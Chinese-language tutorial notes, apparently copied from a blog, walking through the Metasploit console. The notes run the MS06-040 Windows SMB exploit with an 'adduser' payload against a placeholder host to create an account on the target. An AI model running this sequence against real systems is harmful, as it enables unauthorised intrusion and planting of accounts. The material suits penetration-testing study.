使用metasploit console

////////////////////////////////////////////////////////////////知识抄袭/////////////////////////////////////////////////////////////////////////////////////

msf >show exploits

显示MetaSploit目前所能够测试的所有漏洞及相关描述

msf >use windows/smb/ms06_040_netapi

选择MS06_040进行测试

msf>info

显示当前所选漏洞的描述信息

msf>show targets

显示当前所选漏洞能够影响的操作系统

msf>set target 0

设置target 为0，即自动识别Windows2000和WindowsXP系统

msf>show payloads

显示可适合于当前所选漏洞的shellcode

msf>set payload windows/adduser

选用adduser为shellcode

msf>show options

显示当前所选漏洞和shellcode需要配置的选项

msf>set RHOST XX.XX.XX.XX

按照show options的提示设置目标主机地址

msf>set PASS  XXXXXXXXXXX

按照show options的提示设置账户密码

msf>set USER XXXXXX

按照show options的提示设置用户名

msf>exploit

进行攻击测试

////////////////////////////////////////////////////////////

注意set的大小写

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

http://liuviphui.blog.163.com/blog/static/20227308420131271295780/

http://www.h3c.com.cn/About_H3C/Company_Publication/IP_Lh/2013/03/Home/Catalog/201307/790128_30008_0.htm